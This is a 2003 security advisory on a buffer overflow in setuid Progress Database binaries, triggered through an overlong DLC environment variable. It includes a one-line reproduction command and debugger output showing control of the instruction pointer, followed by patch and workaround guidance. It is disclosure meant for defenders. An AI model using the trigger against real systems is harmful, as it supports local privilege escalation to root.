14th Apr 2003 [SBWID-6141]
COMMAND
	Progress Database poor bounds checking (local root compromise)
SYSTEMS AFFECTED
	Versions 6 to 9.1D05 (immune)
PROBLEM
	KF  [http://www.snosoft.com]  found  and  reported  in  Secure   Network
	Operations, Inc. advisory SRT2003-04-01-1231:
	Proof Of Concept Status : SNO has NUMEROUS exploits  for  the  described
	situation Low Level Description	:
	In the  past  Progress  Software  (http://www.progress.com)  has  had  a
	number of security vulnerabilities.  Most  of  these  issues  have  been
	cross platform and spread  across  multiple  versions  of  the  Progress
	database. The current Progress policy is to  fix  the  vulnerability  in
	the most recent and supported version of the software  in  question.  In
	efforts  to  illustrate  the  importance  of  upgrading  your   Progress
	installation I am going to detail  one  such  cross  version  and  cross
	platform vulnerability.
	In the Progress environment the DLC variable  tells  Progress  where  it
	can find the base installation directory. (Un)fortunately when  Progress
	binaries request and use the DLC variable there is a lack of user  input
	verification in the form of bounds checking. In both  lab  and  customer
	environments SNOSoft  has  been  able  to  use  this  flaw  to  run  our
	shellcode (machine instructions) of choice. The result  of  our  testing
	shows that a full root compromise is quite plausible.
	Our testing was conducted on the following Progress versions under  unix
	based environments:
	
	PROGRESS Developer's Toolkit Version 6.2K02 as of Fri Dec 6 20:00:11 EST 1991
	"The PROGRESS 4GL&RDBMS" Version 6.3E14 as of Thu Sep 08 23:46:06 EDT 1994
	PROGRESS Version 7.3E as of Thu Apr 17 18:12:18 EDT 1997
	PROGRESS Version 8.2C as of Fri Feb 20 16:25:13 EST 1998
	PROGRESS Version 8.3A as of Wed Aug  5 19:01:15 EDT 1998
	PROGRESS Version 9.1C as of Wed Jun  6 20:42:24 EDT 2001
	PROGRESS Version 9.1D as of Wed May  8 16:47:54 EDT 2002
	
	Debugger output		:
	The below information confirms the issue is valid  across  all  versions
	between v6 and v9. The results vary depending on  the  stack  layout  of
	the host operating system and endian of the processor.
	First set an overly long DLC variable
	
	bash-2.03$ export DLC=`perl -e 'print "A" x 9000'`
	
	Make sure PROMSGS variable is set or you recieve the following error
	
	bash-2.03$ /u/dlctk/_proutil
	msgopn: unable to open PROMSGS
	bash-2.03$ export PROMSGS=/path/to/promsgs
	
	Earlier versions (v6) may not  be  exploitable  (on  SCO  OpenServer  at
	least) however this can not be confirmed at this time
	
	bash-2.03$ /u/dlctk/_proutil
	SYSTEM ERROR: strent request for more than 32K (893)
	** Please save file named core for analysis by PSC. (439)
	Quit (core dumped)
	bash-2.03$ /u/dlc6/_mprosrv
	11:48:07 SYSTEM ERROR: strent request for more than 32K (893)
	11:48:07 ** Please save file named core for analysis by PSC. (439)
	Quit
	
	on versions beyond v7 the behavior changes to a  positively  exploitable
	situation
	
	# /u/dlc7/bin/_mprosrv
	(hangs and must be sent a kill signal)
	Killed
	Starting program: /u/dlc7/bin/_mprosrv
	Program received signal SIGSEGV, Segmentation fault.
	0x6fc93 in getenv ()
	(gdb) bt
	#0  0x6fc93 in getenv ()
	#1  0x6f6fa in _tz_info ()
	#2  0x75c59 in tzset ()
	#3  0x6e3f1 in localtime_r ()
	#4  0x6e2f0 in localtime ()
	#5  0x4aebb in uthms ()
	#6  0x286c in dblgm ()
	#7  0x8664 in Iomsgw ()
	#8  0x79c3 in msgout ()
	#9  0x7782 in msgn ()
	#10 0x8221 in drpfile ()
	#11 0x82c1 in drstartpf ()
	#12 0x41414141 in ?? ()
	Cannot access memory at address 0x41414141.
	# /u/dlc8/bin/_mprosrv
	(hangs and must be sent a kill signal)
	Killed
	Starting program: /u/dlc8/bin/_mprosrv
	(no debugging symbols found)...(no debugging symbols found)...
	(no debugging symbols found)...
	Program received signal SIGSEGV, Segmentation fault.
	0x80021c2d in getenv ()
	(gdb) bt
	#0  0x80021c2d in getenv ()
	#1  0x8001f2da in _tz_info ()
	#2  0x8004e5c2 in tzset ()
	#3  0x8004e4ba in _localtime_r ()
	#4  0x8001db5f in localtime ()
	#5  0x80a9d57 in uthms ()
	#6  0x804d698 in dblgm ()
	#7  0x805495d in .text ()
	#8  0x8053b73 in msgout ()
	#9  0x805394c in msgn ()
	#10 0x80544d1 in drpfile ()
	#11 0x8054581 in drstartpf ()
	#12 0x41414141 in ?? ()
	Cannot access memory at address 0x41414141.
	# /u/dlc9/bin/_mprosrv
	(hangs and must be sent a kill signal)
	Killed
	Starting program: /u/dlc9/bin/_mprosrv
	Program received signal SIGSEGV, Segmentation fault.
	Cannot remove breakpoints because program is no longer writable.
	It might be running in another process.
	Further execution is probably impossible.
	0x80087e40 in ?? ()Cannot access memory at address 0x8005400c.
	(gdb) bt
	#0  0x80087e40 in ?? ()Cannot access memory at address 0x8005400c.
	(gdb) i r
	eax            0x8131e80        135470720
	ecx            0x54     84
	edx            0x8045adc        134503132
	ebx            0x800dcc4c       -2146579380
	esp            0x8044d5c        0x8044d5c
	ebp            0x800da78c       0x800da78c
	esi            0x800da78c       -2146588788
	edi            0x41414141       1094795585
	eip            0x80087e40       0x80087e40
	ps             0x10206  66054
	cs             0x17     23
	ss             0x1f     31
	ds             0x1f     31
	es             0x1f     31
	fs             0x0      0
	gs             0x0      0
	
SOLUTION
	Patch or Workaround	: Upgrade to Progress version 9.1D05
	Recently Progress addressed the above  mentioned  issue  in  the  latest
	9.1D patch. Our understanding is that in  order  to  receive  protection
	from the DLC buffer overflow customers should upgrade to 9.1D05 as  soon
	as possible. No plans have  been  made  to  roll  these  fixes  back  to
	previous versions. It is also our understanding that the  product  known
	as 9.1C will be "retired" soon.
	Patches to the 9.1D version are available here:
	
	http://www.progress.com/patches/patchlst/91D-156v.htm
	
	The patch description is as follows:
	
	20021204-055 * DB - signal services
	
	The $DLC environment variable can be used  to  mount  a  buffer-overflow
	attack on Progress privileged binaries.
	A patched system should respond as follows:
	
	sh-2.05b# export DLC=`perl -e 'print "A" x 9000'`
	sh-2.05b# export PROMSGS=/usr/dlc/promsgs
	sh-2.05b# /usr/dlc/bin/_mprosrv
	12:01:06 The DLC environment variable exceeds it's maximum length of 4095 bytes
	(11001).
	
	a valid work around to nearly any Progress security hole  is  to  remove
	the suid bit from all binaries